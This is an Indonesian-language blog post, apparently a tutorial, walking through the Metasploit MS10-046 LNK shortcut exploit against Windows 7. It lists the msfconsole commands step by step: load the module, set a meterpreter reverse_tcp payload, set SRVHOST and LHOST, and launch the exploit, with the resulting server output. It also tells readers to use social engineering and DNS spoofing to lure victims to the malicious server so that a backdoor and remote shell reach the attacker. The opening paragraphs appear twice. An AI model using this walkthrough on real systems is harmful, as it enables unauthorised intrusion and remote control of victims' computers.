Exploit ms10_046_shortcut_icon_dllloader win7 attack
exploit ini masih work di windows7 .. walaupun memang dibutuhkan
tehnik2 social engineering untuk membawa target membuka malicious url
yang sudah anda siapkan sebelumnya … oke untuk tutorial kali ini kembali
lagi ane menggunakan dracos2 x64 .. mungkin yang mau nyoba-nyoba dracos
bisa kesini
http://backtrack.org
Pertama-tama buka console msf kita .. ( bypass lewat msfcli juga bisa kok )
lanjutkan dengan menggunakan fasilitas search
Notes : gunakan tehnik2 social engineering, dns spoof dan masih banyak lagi untuk menggiring korban anda dalam mengakses server malicious anda ..
akhir kata saya ucapkan selamat makan
http://backtrack.org
Pertama-tama buka console msf kita .. ( bypass lewat msfcli juga bisa kok )
root@dracos:~# msfconsoleSetelah terbuka seperti ini
lanjutkan dengan menggunakan fasilitas search
msf > search LNK Matching Modules ================ Name Disclosure Date Rank Description ---- --------------- ---- ----------- exploit/windows/browser/ms10_046_shortcut_icon_dllloader 2010-07-16 excellent Microsoft Windows Shell LNK Code Execution post/windows/escalate/droplnk normal Windows Escalate SMB Icon LNK Dropper post/windows/gather/dumplinks normal Windows Gather Dump Recent Files lnk InfoTuh sudah kelihatan exploit yang kita cari .. gunakan exploit tersebut
msf > use exploit/windows/browser/ms10_046_shortcut_icon_dllloaderTerus biar kita jadi mode listener kita gunakan payload windows meterpreter reverse TCP
msf exploit(ms10_046_shortcut_icon_dllloader) > set payload windows/meterpreter/reverse_tcpCek opsi2 yang kita perlu dalam menjalankan exploit ini
msf exploit(ms10_046_shortcut_icon_dllloader) > show options Module options (exploit/windows/browser/ms10_046_shortcut_icon_dllloader): Name Current Setting Required Description ---- --------------- -------- ----------- SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0 SRVPORT 80 yes The daemon port to listen on (do not change) SSLCert no Path to a custom SSL certificate (default is randomly generated) UNCHOST no The host portion of the UNC path to provide to clients (ex: 1.2.3.4). URIPATH / yes The URI to use (do not change). Payload options (windows/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC process yes Exit technique: seh, thread, process, none LHOST yes The listen address LPORT 4444 yes The listen port Exploit target: Id Name -- ---- 0 AutomaticOk kita butuh alamat server ( srvhost ) dimana nantinya metasploit akan memulai malicious url dengan port 80 ( default ) dan path / uripath ( / )
msf exploit(ms10_046_shortcut_icon_dllloader) > set SRVHOST 192.168.2.7 SRVHOST => 192.168.2.7Kebetulan sih ip yang ane pake pada percobaan ini adalah
root@dracos:~# ifconfig wlan0 |grep inet inet addr:192.168.2.7 Bcast:192.168.2.255 Mask:255.255.255.0 inet6 addr: fe80::f6ec:38ff:fe99:60f3/64 Scope:LinkTerus sebagai persyaratan payload reverse TCP kita wajib memberikan informasi local host kita ( LHOST )
msf exploit(ms10_046_shortcut_icon_dllloader) > set LHOST 192.168.2.7 LHOST => 192.168.2.7Jalankan exploit dengan perintah exploit .. gk usah di tambahkan -j untuk opsi background process karena exploit ini sudah dengan sendirinya berjalan di sana
msf exploit(ms10_046_shortcut_icon_dllloader) > [*] 192.168.2.7 ms10_046_shortcut_icon_dllloader - Sending UNC redirect [*] 192.168.2.7 ms10_046_shortcut_icon_dllloader - Responding to WebDAV OPTIONS request [*] 192.168.2.7 ms10_046_shortcut_icon_dllloader - Responding to WebDAV OPTIONS request [*] 192.168.2.7 ms10_046_shortcut_icon_dllloader - Received WebDAV PROPFIND request for /bnVuSf [*] 192.168.2.7 ms10_046_shortcut_icon_dllloader - Sending 301 for /bnVuSf ... [*] 192.168.2.7 ms10_046_shortcut_icon_dllloader - Received WebDAV PROPFIND sniff..hmm ketika target membuka url malicious kita maka dengan sendiri nya server malicious akan mengirimkan backdoor .. dan meterpreter pun terbuka untuk attacker
Notes : gunakan tehnik2 social engineering, dns spoof dan masih banyak lagi untuk menggiring korban anda dalam mengakses server malicious anda ..
akhir kata saya ucapkan selamat makan
Comments
Post a Comment